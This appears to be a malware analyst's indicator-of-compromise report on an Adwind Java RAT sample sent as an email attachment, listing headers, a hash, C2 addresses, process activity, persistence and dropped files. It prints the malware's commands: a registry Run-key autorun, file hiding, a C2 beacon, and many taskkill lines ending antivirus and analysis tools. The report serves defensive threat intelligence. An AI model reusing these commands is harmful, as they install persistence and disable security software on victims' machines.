#adwind_261218

VRad Dec 27th, 2018 (edited)
#IOC #OptiData #VR #Adwind #Java #JAR #JRE

https://pastebin.com/BqbDN6Sr

FAQ:
https://radetskiy.wordpress.com/2018/05/11/ioc_adwind_100518/

attack_vector
--------------
email attach .JAR > WSH > JRE > AppData\Roaming\*.jar + *.vbs

email_headers
--------------
Received: from gunimo.com ([167.99.137.237])
    by srv8.victim1.com for <user0@org7.victim1.com>;
    Wed, 26 Dec 2018 12:24:21 +0200 (EET)
    (envelope-from tony.turner@stoneacre.co.uk)
Received: from [102.165.33.14]
    by gunimo.com with esmtpsa (TLS1.0:DHE_RSA_AES_256_CBC_SHA1:256)
    (Exim 4.84_2) (envelope-from <tony.turner@stoneacre.co.uk>)
    id 1gZrOo-0001md-CS; Thu, 20 Dec 2018 06:01:44 +0000
Subject: Order
To: Recipients <tony.turner@stoneacre.co.uk>
From: "Tony" <tony.turner@stoneacre.co.uk>

files
--------------
SHA-256 b5cf1f4216841631e80ad31be8f623399d2a2c7057d3f7a062c9c7b2055eec11
File name   Order.jar
File size   634.28 KB

activity
**************

JAR > JRE > WSH > JRE > collect system info & open remote connection

network
--------------
185.183.97.184  goz.unknowncrypter{.} com:7789  POST /is-ready HTTP/1.1
AC38D1C7<|>APM11<|>operator<|>Microsoft Windows 7 ... <|>plus<|>nan-av<|>false - 26.12.2018

comp
--------------
java.exe    2628    TCP 127.0.0.1       7777    SYN_SENT
wscript.exe 2104    TCP 185.183.97.184  7789    ESTABLISHED
javaw.exe   976     TCP 185.244.30.121  4379    SYN_SENT

proc
--------------
"C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe" -jar "C:\Users\operator\Desktop\Order.jar"
C:\Windows\system32\wscript.exe  C:\Users\operator\ufcgwhauov.vbs
"C:\Windows\System32\WScript.exe" "C:\Users\operator\AppData\Roaming\dVvzehDtJK.vbs"
C:\Windows\System32\cmd.exe" /c "C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe" -version 2> C:\tmp\output.txt
"C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe"  -version
"C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe"  -jar "C:\Users\operator\AppData\Roaming\ntfsmgr.jar"
"C:\Program Files\Java\jre1.8.0_191\bin\java.exe" -jar C:\tmp\_0.90765668489300629104286604121415413.class

C:\Windows\system32\cmd.exe
    C:\tmp\Retrive275305157297834866.vbs
    C:\tmp\Retrive3342971358066659593.vbs
    C:\tmp\Retrive5146022430127275435.vbs
    C:\tmp\Retrive118764366264415957.vbs

C:\Windows\system32\xcopy.exe  "C:\Program Files\Java\jre1.8.0_191" "C:\Users\operator\AppData\Roaming\Oracle\" /e

C:\Windows\system32\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v zaRukQhXbGj /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\TpTuKAZzLlb\SjzfHALFGLg.uJjalI\"" /f

C:\Windows\system32\attrib.exe attrib +h "C:\Users\operator\TpTuKAZzLlb\*.*"

C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\operator\TpTuKAZzLlb\SjzfHALFGLg.uJjalI
C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe -jar C:\tmp\_0.58402873485980682215056483974766042.class
C:\Windows\system32\cmd.exe
    C:\tmp\Retrive3841406484415973045.vbs
    C:\tmp\Retrive4727136555263513640.vbs
    C:\tmp\Retrive7570843625298647226.vbs
    C:\tmp\Retrive8366581331663954177.vbs

C:\Windows\system32\taskkill.exe /IM ProcessHacker.exe /T /F

C:\Windows\system32\cmd.exe  /c regedit.exe /s C:\tmp\CEBqbLoDPx3000572971971620291.reg

C:\Windows\system32\taskkill.exe

taskkill /IM MSASCui.exe /T /F
taskkill /IM MsMpEng.exe /T /F
taskkill /IM MpUXSrv.exe /T /F
taskkill /IM MpCmdRun.exe /T /F
taskkill /IM NisSrv.exe /T /F
taskkill /IM ConfigSecurityPolicy.exe /T /F
taskkill /IM procexp.exe /T /F
taskkill /IM wireshark.exe /T /F
...
taskkill /IM FortiClient_Diagnostic_Tool.exe /T /F
taskkill /IM twsscan.exe /T /F
taskkill /IM UserReg.exe /T /F


persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run              26.12.2018 17:38

@dVvzehDtJK
c:\users\operator\appdata\roaming\dvvzehdtjk.vbs    26.12.2018 17:38
wscript.exe //B "C:\Users\operator\AppData\Roaming\dVvzehDtJK.vbs"

@ntfsmgr    Java(TM) Platform SE binary Oracle Corporation
c:\program files\java\jre1.8.0_191\bin\javaw.exe    06.10.2018 18:42
"C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe" -jar "C:\Users\operator\AppData\Roaming\ntfsmgr.jar"

@zaRukQhXbGj    Java(TM) Platform SE binary Oracle Corporation
c:\users\operator\appdata\roaming\oracle\bin\javaw.exe  06.10.2018 18:42
"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe" -jar "C:\Users\operator\TpTuKAZzLlb\SjzfHALFGLg.uJjalI"

C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup             26.12.2018 17:38
@dVvzehDtJK.vbs
c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\dvvzehdtjk.vbs  26.12.2018 17:38
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dVvzehDtJK.vbs

drop
--------------
 C:\Users\operator\ufcgwhauov.vbs
 C:\Users\operator\AppData\Roaming\dVvzehDtJK.vbs
 C:\tmp\output.txt
 C:\Users\operator\AppData\Roaming\ntfsmgr.jar
 C:\tmp\_0.90765668489300629104286604121415413.class
 C:\tmp\Retrive275305157297834866.
 C:\tmp\Retrive3342971358066659593.vbs
 C:\tmp\Retrive5146022430127275435.vbs
 C:\tmp\Retrive118764366264415957.vbs
 C:\Users\operator\AppData\Roaming\Oracle\
 C:\Users\operator\TpTuKAZzLlb\
 C:\Users\operator\TpTuKAZzLlb\SjzfHALFGLg.uJjalI
 C:\Users\operator\fUTkALeaTxM\
 C:\tmp\_0.58402873485980682215056483974766042.class
 C:\tmp\Retrive3841406484415973045.vbs
 C:\tmp\Retrive4727136555263513640.vbs
 C:\tmp\Retrive7570843625298647226.vbs
 C:\tmp\Retrive8366581331663954177.vbs
 C:\tmp\CEBqbLoDPx3000572971971620291.reg

VR

# # #
https://www.virustotal.com/#/file/b5cf1f4216841631e80ad31be8f623399d2a2c7057d3f7a062c9c7b2055eec11/details